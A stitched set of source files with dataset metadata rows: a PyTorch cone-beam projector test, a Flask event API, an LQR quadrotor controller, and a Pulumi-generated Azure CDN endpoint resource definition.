# import conebeam_projector
# other_projector = conebeam_projector.CudaProjector()
volume = projector.new_volume_tensor()
volume += 1.
result = projector.project_forward(volume, use_texture=False)
# import pyconrad.autoinit
# pyconrad.imshow(result)
reco = projector.project_backward(result, use_texture=False)
# import pyconrad.autoinit
# pyconrad.imshow(reco)
assert result is not None
assert reco is not None
def test_register_hook():
was_executed = False
def require_nonleaf_grad(v):
def hook(g):
nonlocal was_executed
was_executed = True
v.grad_nonleaf = g
v.register_hook(hook)
projector = pyronn_torch.ConeBeamProjector(
(128, 128, 128), (2.0, 2.0, 2.0), (-127.5, -127.5, -127.5),
(2, 480, 620), [1.0, 1.0], (0, 0),
np.array(
[[[-3.10e+2, -1.20e+03, 0.00e+00, 1.86e+5],
[-2.40e+2, 0.00e+00, 1.20e+03, 1.44e+5],
[-1.00e+00, 0.00e+00, 0.00e+00, 6.00e+2]],
[[-2.89009888e+2, -1.20522754e+3, -1.02473585e-13, 1.86000000e+5],
[-2.39963440e+2, -4.18857765e+0, 1.20000000e+3, 1.44000000e+5],
[-9.99847710e-01, -1.74524058e-2, 0.00000000e+0,
6.00000000e+2]]]))
x = projector.new_volume_tensor(requires_grad=True)
require_nonleaf_grad(x)
loss = projector.project_forward(x)
loss.mean().backward()
x.grad_nonleaf
assert was_executed
| 30.76087
| 79
| 0.641519
| 767
| 5,660
| 4.585398
| 0.143416
| 0.061416
| 0.020472
| 0.063122
| 0.820586
| 0.806085
| 0.804379
| 0.793005
| 0.766847
| 0.723344
| 0
| 0.151253
| 0.224382
| 5,660
| 183
| 80
| 30.928962
| 0.649658
| 0.04841
| 0
| 0.764228
| 0
| 0
| 0.027949
| 0
| 0
| 0
| 0
| 0
| 0.146341
| 1
| 0.073171
| false
| 0
| 0.089431
| 0
| 0.162602
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e1a89978db04c6d4bb41d715fd6fb4d53f2cd2d2
| 9,019
|
py
|
Python
|
services/event_service/event_info_services.py
|
hnguyenworkstation/hoocons_backend
|
725461812a172ca0a88181e3399e6e2294953273
|
[
"MIT"
] | null | null | null |
services/event_service/event_info_services.py
|
hnguyenworkstation/hoocons_backend
|
725461812a172ca0a88181e3399e6e2294953273
|
[
"MIT"
] | null | null | null |
services/event_service/event_info_services.py
|
hnguyenworkstation/hoocons_backend
|
725461812a172ca0a88181e3399e6e2294953273
|
[
"MIT"
] | null | null | null |
from datetime import datetime
from flask_jwt import jwt_required, current_identity
from flask_restful import reqparse, Resource
from static import app_constant
import static.status as status
from models.base_event import BaseEvent
from models.action import BaseAction
class CreateEventRequest(Resource):
@jwt_required()
def post(self):
try:
user = current_identity.user()
if user is None:
return {"message": "Unable to find user information"}, status.HTTP_401_UNAUTHORIZED
parser = reqparse.RequestParser()
parser.add_argument("text_context", type=str, location="json")
parser.add_argument("images", type=list, location="json")
parser.add_argument("contain_event", type=str, location="json")
parser.add_argument("privacy", type=str, location="json")
parser.add_argument("longitude", type=float, location="json")
parser.add_argument("latitude", type=float, location="json")
parser.add_argument("tags", type=list, location="json")
body = parser.parse_args()
event = BaseEvent(create_by=user, text_context=body.text_context,
images=body.images, contain_event=body.contain_event,
privacy=body.privacy, location=[body.longitude, body.latitude],
tags=body.tags).save()
# Now create an action
action = BaseAction(by_user=user, action_type=app_constant.action_create_new_event, target=event.id,
action_priority=app_constant.priority_medium).save()
user.update(add_to_set__posted_events=event, add_toset__recent_actions=action,
last_online=datetime.utcnow())
return event.get_initial_json(), status.HTTP_200_OK
except Exception as e:
return {"error": str(e)}, status.HTTP_400_BAD_REQUEST
class UpdateEventRequest(Resource):
@jwt_required()
def put(self):
try:
user = current_identity.user()
if user is None:
return {"message": "Unable to find user information"}, status.HTTP_401_UNAUTHORIZED
parser = reqparse.RequestParser()
parser.add_argument("event_id", type=str, location="json")
parser.add_argument("text_context", type=str, location="json")
parser.add_argument("images", type=list, location="json")
parser.add_argument("contain_event", type=str, location="json")
parser.add_argument("privacy", type=str, location="json")
parser.add_argument("longitude", type=float, location="json")
parser.add_argument("latitude", type=float, location="json")
parser.add_argument("tags", type=list, location="json")
body = parser.parse_args()
event = BaseEvent.objects(id=body.event_id).first()
if event is None or event not in user.posted_events:
return {"message": "no permission to delete"}, status.HTTP_203_NON_AUTHORITATIVE_INFORMATION
event.update(text_context=body.text_context, images=body.images, contain_event=body.contain_event,
privacy=body.privacy, location=[body.longitude, body.latitude], tags=body.tags, is_edited=True,
last_edit_at=datetime.utcnow())
user.update(last_online=datetime.utcnow())
return event.get_complete_json(), status.HTTP_200_OK
except Exception as e:
return {"error": str(e)}, status.HTTP_400_BAD_REQUEST
class UpdateTextEventRequest(Resource):
@jwt_required()
def put(self):
try:
user = current_identity.user()
if user is None:
return {"message": "Unable to find user information"}, status.HTTP_401_UNAUTHORIZED
parser = reqparse.RequestParser()
parser.add_argument("event_id", type=str, location="json")
parser.add_argument("text_context", type=str, location="json")
body = parser.parse_args()
event = BaseEvent.objects(id=body.event_id).first()
if event is None or event not in user.posted_events:
return {"message": "no permission to delete"}, status.HTTP_203_NON_AUTHORITATIVE_INFORMATION
event.update(text_context=body.text_context, is_edited=True, last_edit_at=datetime.utcnow())
user.update(last_online=datetime.utcnow())
return event.get_complete_json(), status.HTTP_200_OK
except Exception as e:
return {"error": str(e)}, status.HTTP_400_BAD_REQUEST
class UpdateLocationEventRequest(Resource):
@jwt_required()
def put(self):
try:
user = current_identity.user()
if user is None:
return {"message": "Unable to find user information"}, status.HTTP_401_UNAUTHORIZED
parser = reqparse.RequestParser()
parser.add_argument("event_id", type=str, location="json")
parser.add_argument("longitude", type=float, location="json")
parser.add_argument("latitude", type=float, location="json")
body = parser.parse_args()
event = BaseEvent.objects(id=body.event_id).first()
if event is None or event not in user.posted_events:
return {"message": "no permission to delete"}, status.HTTP_203_NON_AUTHORITATIVE_INFORMATION
event.update(location=[body.longitude, body.latitude])
user.update(last_online=datetime.utcnow())
return event.get_complete_json(), status.HTTP_200_OK
except Exception as e:
return {"error": str(e)}, status.HTTP_400_BAD_REQUEST
class UpdateTagsEvent(Resource):
@jwt_required()
def put(self):
try:
user = current_identity.user()
if user is None:
return {"message": "Unable to find user information"}, status.HTTP_401_UNAUTHORIZED
parser = reqparse.RequestParser()
parser.add_argument("event_id", type=str, location="json")
parser.add_argument("tags", type=list, location="json")
body = parser.parse_args()
event = BaseEvent.objects(id=body.event_id).first()
if event is None or event not in user.posted_events:
return {"message": "no permission to delete"}, status.HTTP_203_NON_AUTHORITATIVE_INFORMATION
event.update(tags=body.tags, )
user.update(last_online=datetime.utcnow())
return event.get_complete_json(), status.HTTP_200_OK
except Exception as e:
return {"error": str(e)}, status.HTTP_400_BAD_REQUEST
class DeleteEventRequest(Resource):
@jwt_required()
def delete(self):
try:
user = current_identity.user()
if user is None:
return {"message": "Unable to find user information"}, status.HTTP_401_UNAUTHORIZED
parser = reqparse.RequestParser()
parser.add_argument("event_id", type=str, location="json")
body = parser.parse_args()
event = BaseEvent.objects(id=body.event_id).first()
if event is None:
return {"message": "event does not exists"}, status.HTTP_501_NOT_IMPLEMENTED
if event not in user.posted_events:
return {"message": "no permission to delete"}, status.HTTP_203_NON_AUTHORITATIVE_INFORMATION
# Enough permission and information -> remove event
user.update(pull__posted_events=event, last_online=datetime.utcnow())
event.delete()
return {"message": "success"}, status.HTTP_200_OK
except Exception as e:
return {"error": str(e)}, status.HTTP_400_BAD_REQUEST
class ReportEvent(Resource):
@jwt_required
def post(self):
try:
user = current_identity.user()
if user is None:
return {"message": "Unable to find user information"}, status.HTTP_401_UNAUTHORIZED
parser = reqparse.RequestParser()
parser.add_argument("event_id", type=str, location="json")
body = parser.parse_args()
event = BaseEvent.objects(id=body.event_id).first()
if event is None:
return {"message": "event does not exists"}, status.HTTP_501_NOT_IMPLEMENTED
if event in user.posted_events:
return {"message": "can not report your own event"}, status.HTTP_203_NON_AUTHORITATIVE_INFORMATION
# Enough permission and information -> remove event
user.update(add_to_set__reported_events=event, last_online=datetime.utcnow())
event.update(add_to_set__reported_by=user)
return {"message": "success"}, status.HTTP_200_OK
except Exception as e:
return {"error": str(e)}, status.HTTP_400_BAD_REQUEST
| 44.428571
| 120
| 0.633773
| 1,049
| 9,019
| 5.241182
| 0.123928
| 0.052746
| 0.074209
| 0.064933
| 0.88123
| 0.865042
| 0.859403
| 0.837941
| 0.837941
| 0.837941
| 0
| 0.013114
| 0.264442
| 9,019
| 202
| 121
| 44.648515
| 0.815647
| 0.013305
| 0
| 0.761006
| 0
| 0
| 0.097358
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044025
| false
| 0
| 0.044025
| 0
| 0.314465
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e1cc7c6f02af0f9d76606577120ee27bbbe72d90
| 4,751
|
py
|
Python
|
quadrotor/src/quadrotor/controller.py
|
siavash1999/IDAS-quadrotor
|
dc8daa9e699b696743dff970620f382257cb8802
|
[
"BSD-3-Clause"
] | 1
|
2021-07-23T13:26:45.000Z
|
2021-07-23T13:26:45.000Z
|
quadrotor/src/quadrotor/controller.py
|
siavash1999/IDAS-quadrotor
|
dc8daa9e699b696743dff970620f382257cb8802
|
[
"BSD-3-Clause"
] | null | null | null |
quadrotor/src/quadrotor/controller.py
|
siavash1999/IDAS-quadrotor
|
dc8daa9e699b696743dff970620f382257cb8802
|
[
"BSD-3-Clause"
] | 1
|
2021-08-04T15:30:37.000Z
|
2021-08-04T15:30:37.000Z
|
from control import lqr
import numpy as np
# -------------------------------------------------------------------------------------------------
def Correction2D(K):
for i in range(len(K)):
for j in range(len(K[0])):
if abs(K[i][j]) < 1e-6:
K[i][j] = 0
return K
# -------------------------------------------------------------------------------------------------
def Correction(K):
for i in range(len(K)):
if abs(K[i]) <1e-3:
K[i] = 0
return K
# -------------------------------------------------------------------------------------------------
def hover(g, m, Ix, Iy, Iz):
#Define State and Input Matrices:
A = [[0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0],\
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0],\
[0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0],\
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\
[0,-g, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\
[g, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\
[0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0],\
[0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0],\
[0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0]]
B = [[0 , 0 , 0 , 0 ],\
[0 , 0 , 0 , 0 ],\
[0 , 0 , 0 , 0 ],\
[0 , 1/Ix, 0 , 0 ],\
[0 , 0 , 1/Iy, 0 ],\
[0 , 0 , 0 , 1/Iz],\
[0 , 0 , 0 , 0 ],\
[0 , 0 , 0 , 0 ],\
[-1/m, 0 , 0 , 0 ],\
[0 , 0 , 0 , 0 ],\
[0 , 0 , 0 , 0 ],\
[0 , 0 , 0 , 0 ]]
#Defining weight matrices Q and R for state and input matrices respectively:
Q = [[5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\
[0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\
[0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0],\
[0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0],\
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0],\
[0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0],\
[0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0],\
[0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0],\
[0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0],\
[0, 0, 0, 0, 0, 0, 0, 0, 0, 10, 0, 0],\
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 10, 0],\
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 10]]
R = [[100, 0, 0, 0],\
[ 0, 100, 0, 0],\
[ 0, 0, 100, 0],\
[ 0, 0, 0, 100]]
#Calculating Matrix K gain with LQR method:
k, S, E = lqr(A, B, Q, R)
k = np.array(Correction2D(k))
#Return these variables back to the control file.
return k
# -------------------------------------------------------------------------------------------------
def cruise(g, m, Ix, Iy, Iz, Cd, u_max):
K_cruise = np.zeros((10, 4, 9))
for i in range(10):
u = u_max*(i+1)/10
theta = np.arcsin(-Cd*(u**2)/(m*g))
w = u*np.tan(theta)
#Define State and Input Matrices:
A = [[ 0, 0, 0, 1, 0, np.tan(theta), 0, 0, 0],\
[ 0, 0, 0, 0, 1, 0, 0, 0, 0],\
[ 0, 0, 0, 0, 0, 1/np.cos(theta), 0, 0, 0],\
[ 0, 0, 0, 0, 0, 0, 0, 0, 0],\
[ 0, 0, 0, 0, 0, 0, 0, 0, 0],\
[ 0, 0, 0, 0, 0, 0, 0, 0, 0],\
[ 0, -g*np.cos(theta), 0, 0, -w, 0, -2*Cd*u/m, 0, 0],\
[g*np.cos(theta), 0, 0, w, 0, -u, 0, 0, 0],\
[ 0, -g*np.sin(theta), 0, 0, u, 0, 0, 0, 2*Cd*w/m]]
B = [[0 , 0 , 0 , 0 ],\
[0 , 0 , 0 , 0 ],\
[0 , 0 , 0 , 0 ],\
[0 , 1/Ix, 0 , 0 ],\
[0 , 0 , 1/Iy, 0 ],\
[0 , 0 , 0 , 1/Iz],\
[0 , 0 , 0 , 0 ],\
[0 , 0 , 0 , 0 ],\
[-1/m, 0 , 0 , 0 ]]
#Defining weight matrices Q and R for state and input matrices respectively:
Q = [[5, 0, 0, 0, 0, 0, 0, 0, 0],\
[0, 5, 0, 0, 0, 0, 0, 0, 0],\
[0, 0, 5, 0, 0, 0, 0, 0, 0],\
[0, 0, 0, 1, 0, 0, 0, 0, 0],\
[0, 0, 0, 0, 1, 0, 0, 0, 0],\
[0, 0, 0, 0, 0, 1, 0, 0, 0],\
[0, 0, 0, 0, 0, 0, 10, 0, 0],\
[0, 0, 0, 0, 0, 0, 0, 1, 0],\
[0, 0, 0, 0, 0, 0, 0, 0, 5]]
R = [[1, 0, 0, 0],\
[ 0, 1, 0, 0],\
[ 0, 0, 1, 0],\
[ 0, 0, 0, 1]]
#Calculating Matrix K gain with LQR method:
K, S, E = lqr(A, B, Q, R)
K_cruise[i] = np.array(Correction2D(K))
K_cruise = K_cruise.tolist()
#Return these variables back to the control file.
return K_cruise
# -------------------------------------------------------------------------------------------------
def spin():
return None
| 36.829457
| 99
| 0.291097
| 813
| 4,751
| 1.692497
| 0.094711
| 0.655523
| 0.865552
| 1.008721
| 0.759448
| 0.739826
| 0.734738
| 0.711483
| 0.704215
| 0.704215
| 0
| 0.206099
| 0.399495
| 4,751
| 128
| 100
| 37.117188
| 0.2762
| 0.185856
| 0
| 0.39
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.05
| false
| 0
| 0.02
| 0.01
| 0.12
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
834a028c23ff5e8e423d39690de7746351d117f0
| 56
|
py
|
Python
|
tests/test_mass_project/test_mass_project.py
|
SBRG/MASS-project
|
9e247658700421622df3ba55014709b2c0833435
|
[
"MIT"
] | null | null | null |
tests/test_mass_project/test_mass_project.py
|
SBRG/MASS-project
|
9e247658700421622df3ba55014709b2c0833435
|
[
"MIT"
] | null | null | null |
tests/test_mass_project/test_mass_project.py
|
SBRG/MASS-project
|
9e247658700421622df3ba55014709b2c0833435
|
[
"MIT"
] | 1
|
2021-11-23T00:37:28.000Z
|
2021-11-23T00:37:28.000Z
|
def test_mass_project_import():
import mass_project
| 18.666667
| 31
| 0.803571
| 8
| 56
| 5.125
| 0.625
| 0.536585
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 56
| 2
| 32
| 28
| 0.854167
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 1
| 0
| 1.5
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8350073ebe35c9778a9dbc815f8ae7df6302bc63
| 57,603
|
py
|
Python
|
sdk/python/pulumi_azure/cdn/endpoint.py
|
davidobrien1985/pulumi-azure
|
811beeea473bd798d77354521266a87a2fac5888
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure/cdn/endpoint.py
|
davidobrien1985/pulumi-azure
|
811beeea473bd798d77354521266a87a2fac5888
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure/cdn/endpoint.py
|
davidobrien1985/pulumi-azure
|
811beeea473bd798d77354521266a87a2fac5888
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
import pulumi
import pulumi.runtime
from typing import Union
from .. import utilities, tables
class Endpoint(pulumi.CustomResource):
content_types_to_compresses: pulumi.Output[list]
"""
An array of strings that indicates a content types on which compression will be applied. The value for the elements should be MIME types.
"""
delivery_rules: pulumi.Output[list]
"""
Rules for the rules engine. An endpoint can contain up until 4 of those rules that consist of conditions and actions. A `delivery_rule` blocks as defined below.
* `cacheExpirationAction` (`dict`) - A `cache_expiration_action` block as defined above.
* `behavior` (`str`) - The behavior of the cache. Valid values are `BypassCache`, `Override` and `SetIfMissing`.
* `duration` (`str`) - Duration of the cache. Only allowed when `behavior` is set to `Override` or `SetIfMissing`. Format: `[d.]hh:mm:ss`
* `cacheKeyQueryStringAction` (`dict`) - A `cache_key_query_string_action` block as defined above.
* `behavior` (`str`) - The behavior of the cache key for query strings. Valid values are `Exclude`, `ExcludeAll`, `Include` and `IncludeAll`.
* `parameters` (`str`) - Comma separated list of parameter values.
* `cookiesConditions` (`list`) - A `cookies_condition` block as defined above.
* `matchValues` (`list`) - List of values for the cookie.
* `negateCondition` (`bool`) - Defaults to `false`.
* `operator` (`str`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `selector` (`str`) - Name of the cookie.
* `transforms` (`list`) - Valid values are `Lowercase` and `Uppercase`.
* `deviceCondition` (`dict`) - A `device_condition` block as defined below.
* `matchValues` (`list`) - Valid values are `Desktop` and `Mobile`.
* `negateCondition` (`bool`) - Defaults to `false`.
* `operator` (`str`) - Valid values are `Equal`.
* `httpVersionConditions` (`list`) - A `http_version_condition` block as defined below.
* `matchValues` (`list`) - Valid values are `0.9`, `1.0`, `1.1` and `2.0`.
* `negateCondition` (`bool`) - Defaults to `false`.
* `operator` (`str`) - Valid values are `Equal`.
* `modifyRequestHeaderActions` (`list`) - A `modify_request_header_action` block as defined below.
* `action` (`str`) - Action to be executed on a header value. Valid values are `Append`, `Delete` and `Overwrite`.
* `name` (`str`) - The header name.
* `value` (`str`) - The value of the header. Only needed when `action` is set to `Append` or `overwrite`.
* `modifyResponseHeaderActions` (`list`) - A `modify_response_header_action` block as defined below.
* `action` (`str`) - Action to be executed on a header value. Valid values are `Append`, `Delete` and `Overwrite`.
* `name` (`str`) - The header name.
* `value` (`str`) - The value of the header. Only needed when `action` is set to `Append` or `overwrite`.
* `name` (`str`) - The Name which should be used for this Delivery Rule.
* `order` (`float`) - The order used for this rule, which must be larger than 1.
* `postArgConditions` (`list`) - A `post_arg_condition` block as defined below.
* `matchValues` (`list`) - List of string values.
* `negateCondition` (`bool`) - Defaults to `false`.
* `operator` (`str`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `selector` (`str`) - Name of the post arg.
* `transforms` (`list`) - Valid values are `Lowercase` and `Uppercase`.
* `queryStringConditions` (`list`) - A `query_string_condition` block as defined below.
* `matchValues` (`list`) - List of string values.
* `negateCondition` (`bool`) - Defaults to `false`.
* `operator` (`str`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `transforms` (`list`) - Valid values are `Lowercase` and `Uppercase`.
* `remoteAddressConditions` (`list`) - A `remote_address_condition` block as defined below.
* `matchValues` (`list`) - List of string values. For `GeoMatch` `operator` this should be a list of country codes (e.g. `US` or `DE`). List of IP address if `operator` equals to `IPMatch`.
* `negateCondition` (`bool`) - Defaults to `false`.
* `operator` (`str`) - Valid values are `Any`, `GeoMatch` and `IPMatch`.
* `requestBodyConditions` (`list`) - A `request_body_condition` block as defined below.
* `matchValues` (`list`) - List of string values.
* `negateCondition` (`bool`) - Defaults to `false`.
* `operator` (`str`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `transforms` (`list`) - Valid values are `Lowercase` and `Uppercase`.
* `requestHeaderConditions` (`list`) - A `request_header_condition` block as defined below.
* `matchValues` (`list`) - List of header values.
* `negateCondition` (`bool`) - Defaults to `false`.
* `operator` (`str`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `selector` (`str`) - Header name.
* `transforms` (`list`) - Valid values are `Lowercase` and `Uppercase`.
* `requestMethodCondition` (`dict`) - A `request_method_condition` block as defined below.
* `matchValues` (`list`) - Valid values are `DELETE`, `GET`, `HEAD`, `OPTIONS`, `POST` and `PUT`.
* `negateCondition` (`bool`) - Defaults to `false`.
* `operator` (`str`) - Valid values are `Equal`.
* `requestSchemeCondition` (`dict`) - A `request_scheme_condition` block as defined below.
* `matchValues` (`list`) - Valid values are `HTTP` and `HTTPS`.
* `negateCondition` (`bool`) - Defaults to `false`.
* `operator` (`str`) - Valid values are `Equal`.
* `requestUriConditions` (`list`) - A `request_uri_condition` block as defined below.
* `matchValues` (`list`) - List of string values.
* `negateCondition` (`bool`) - Defaults to `false`.
* `operator` (`str`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `transforms` (`list`) - Valid values are `Lowercase` and `Uppercase`.
* `urlFileExtensionConditions` (`list`) - A `url_file_extension_condition` block as defined below.
* `matchValues` (`list`) - List of string values.
* `negateCondition` (`bool`) - Defaults to `false`.
* `operator` (`str`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `transforms` (`list`) - Valid values are `Lowercase` and `Uppercase`.
* `urlFileNameConditions` (`list`) - A `url_file_name_condition` block as defined below.
* `matchValues` (`list`) - List of string values.
* `negateCondition` (`bool`) - Defaults to `false`.
* `operator` (`str`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `transforms` (`list`) - Valid values are `Lowercase` and `Uppercase`.
* `urlPathConditions` (`list`) - A `url_path_condition` block as defined below.
* `matchValues` (`list`) - List of string values.
* `negateCondition` (`bool`) - Defaults to `false`.
* `operator` (`str`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `transforms` (`list`) - Valid values are `Lowercase` and `Uppercase`.
* `urlRedirectAction` (`dict`) - A `url_redirect_action` block as defined below.
* `fragment` (`str`) - Specifies the fragment part of the URL. This value must not start with a `#`.
* `hostname` (`str`) - Specifies the hostname part of the URL.
* `path` (`str`) - Specifies the path part of the URL. This value must begin with a `/`.
* `protocol` (`str`) - Specifies the protocol part of the URL. Valid values are `Http` and `Https`.
* `queryString` (`str`) - Specifies the query string part of the URL. This value must not start with a `?` or `&` and must be in `<key>=<value>` format separated by `&`.
* `redirectType` (`str`) - Type of the redirect. Valid values are `Found`, `Moved`, `PermanentRedirect` and `TemporaryRedirect`.
* `urlRewriteAction` (`dict`) - A `url_rewrite_action` block as defined below.
* `destination` (`str`) - This value must start with a `/` and can't be longer than 260 characters.
* `preserveUnmatchedPath` (`bool`) - Defaults to `true`.
* `sourcePattern` (`str`) - This value must start with a `/` and can't be longer than 260 characters.
"""
geo_filters: pulumi.Output[list]
"""
A set of Geo Filters for this CDN Endpoint. Each `geo_filter` block supports fields documented below.
* `action` (`str`) - The Action of the Geo Filter. Possible values include `Allow` and `Block`.
* `countryCodes` (`list`) - A List of two letter country codes (e.g. `US`, `GB`) to be associated with this Geo Filter.
* `relative_path` (`str`) - The relative path applicable to geo filter.
"""
global_delivery_rule: pulumi.Output[dict]
"""
Actions that are valid for all resources regardless of any conditions. A `global_delivery_rule` block as defined below.
* `cacheExpirationAction` (`dict`) - A `cache_expiration_action` block as defined above.
* `behavior` (`str`) - The behavior of the cache. Valid values are `BypassCache`, `Override` and `SetIfMissing`.
* `duration` (`str`) - Duration of the cache. Only allowed when `behavior` is set to `Override` or `SetIfMissing`. Format: `[d.]hh:mm:ss`
* `cacheKeyQueryStringAction` (`dict`) - A `cache_key_query_string_action` block as defined above.
* `behavior` (`str`) - The behavior of the cache key for query strings. Valid values are `Exclude`, `ExcludeAll`, `Include` and `IncludeAll`.
* `parameters` (`str`) - Comma separated list of parameter values.
* `modifyRequestHeaderActions` (`list`) - A `modify_request_header_action` block as defined below.
* `action` (`str`) - Action to be executed on a header value. Valid values are `Append`, `Delete` and `Overwrite`.
* `name` (`str`) - The header name.
* `value` (`str`) - The value of the header. Only needed when `action` is set to `Append` or `overwrite`.
* `modifyResponseHeaderActions` (`list`) - A `modify_response_header_action` block as defined below.
* `action` (`str`) - Action to be executed on a header value. Valid values are `Append`, `Delete` and `Overwrite`.
* `name` (`str`) - The header name.
* `value` (`str`) - The value of the header. Only needed when `action` is set to `Append` or `overwrite`.
* `urlRedirectAction` (`dict`) - A `url_redirect_action` block as defined below.
* `fragment` (`str`) - Specifies the fragment part of the URL. This value must not start with a `#`.
* `hostname` (`str`) - Specifies the hostname part of the URL.
* `path` (`str`) - Specifies the path part of the URL. This value must begin with a `/`.
* `protocol` (`str`) - Specifies the protocol part of the URL. Valid values are `Http` and `Https`.
* `queryString` (`str`) - Specifies the query string part of the URL. This value must not start with a `?` or `&` and must be in `<key>=<value>` format separated by `&`.
* `redirectType` (`str`) - Type of the redirect. Valid values are `Found`, `Moved`, `PermanentRedirect` and `TemporaryRedirect`.
* `urlRewriteAction` (`dict`) - A `url_rewrite_action` block as defined below.
* `destination` (`str`) - This value must start with a `/` and can't be longer than 260 characters.
* `preserveUnmatchedPath` (`bool`) - Defaults to `true`.
* `sourcePattern` (`str`) - This value must start with a `/` and can't be longer than 260 characters.
"""
host_name: pulumi.Output[str]
"""
A string that determines the hostname/IP address of the origin server. This string can be a domain name, Storage Account endpoint, Web App endpoint, IPv4 address or IPv6 address. Changing this forces a new resource to be created.
"""
is_compression_enabled: pulumi.Output[bool]
"""
Indicates whether compression is to be enabled. Defaults to false.
"""
is_http_allowed: pulumi.Output[bool]
"""
Defaults to `true`.
"""
is_https_allowed: pulumi.Output[bool]
"""
Defaults to `true`.
"""
location: pulumi.Output[str]
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
name: pulumi.Output[str]
"""
The name of the origin. This is an arbitrary value. However, this value needs to be unique under the endpoint. Changing this forces a new resource to be created.
"""
optimization_type: pulumi.Output[str]
"""
What types of optimization should this CDN Endpoint optimize for? Possible values include `DynamicSiteAcceleration`, `GeneralMediaStreaming`, `GeneralWebDelivery`, `LargeFileDownload` and `VideoOnDemandMediaStreaming`.
"""
origin_host_header: pulumi.Output[str]
"""
The host header CDN provider will send along with content requests to origins. Defaults to the host name of the origin.
"""
origin_path: pulumi.Output[str]
"""
The path used at for origin requests.
"""
origins: pulumi.Output[list]
"""
The set of origins of the CDN endpoint. When multiple origins exist, the first origin will be used as primary and rest will be used as failover options. Each `origin` block supports fields documented below.
